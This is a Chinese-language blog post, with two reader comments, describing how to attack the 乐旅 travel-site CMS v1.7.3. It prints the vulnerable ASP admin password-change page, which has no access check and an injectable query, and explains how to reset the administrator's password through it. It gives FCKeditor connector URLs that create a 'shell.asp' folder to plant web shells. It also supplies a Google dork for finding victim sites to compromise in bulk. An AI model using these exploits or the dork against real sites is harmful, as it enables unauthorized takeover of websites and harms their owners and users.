作者:Lan3a
第一:
管理员目录下的Admin_Passod.asp
<!–#include file=”../Include/conn.asp”–>
<!–#include file=”../Include/md5.asp”–>
<%
select case request.QueryString(“Action”)
case “ModifyPass”
SaveNewPass
case else
end select
set rs = server.createobject(“adodb.recordset”)
sql=”select * from Lelv_w_manage order by id desc”
rs.open sql,conn,1,3
AdminName=rs(“AdminName”)
rs.close
%>
function SaveNewPass()
dim LoginName,rs,sql
LoginName=request(“AdminName”)
set rs = server.createobject(“adodb.recordset”)
sql=”select * from Lelv_w_manage where AdminName=’”&LoginName&”‘”
rs.open sql,conn,1,3
if rs.bof and rs.eof then
response.write “读取数据库记录出错!”
response.end
else
if len(trim(Request.Form(“NewPassword”)))<6 or len(trim(Request.Form(“NewPassword”)))>20 then
response.write “<script language=javascript> alert(‘管理员密码必填,且字符数为6-20位!’);history.back(-1);</script>”
response.end
end if
if Request.Form(“NewPassword”)<>Request.Form(“vNewPassword”) then
response.write “<script language=javascript> alert(‘两次输入的密码不一样!’);history.back(-1);</script>”
response.end
end if
rs(“Password”)=Md5(Request.Form(“NewPassword”))
rs.update
rs.close
这个文件是用来修改密码的。但作者未对这个文件做访问限制。
所以我们可以利用它来修改管理员的密码。
利用方法很简单:
http://localhost/admin/Admin_Passod.asp
第二个漏洞:
FCK上传漏洞,最近看到很多程序都存在这个漏洞。
http://localhost/fckeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684
http://localhost/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=../../connectors/asp/connector.asp
官网不存在第一个问题。
两种可能性:一是修改了后台路径的,二是删除了那个文件。
如何批量批量入侵乐旅旅游网站管理系统?
在Google输入关键字:
inurl:Plan_Show.asp?InfoId=
2 回应 至“”乐旅旅游网站管理系统 v1.7.3 Oda””
FCK上传漏洞,在zblog中是否也存在?担心这个!
Zblog应该不存在吧,以前测试的时候发现Zblog对文件上传那一步进行了权限分析。
而且FCK的漏洞只存在于IIS6.0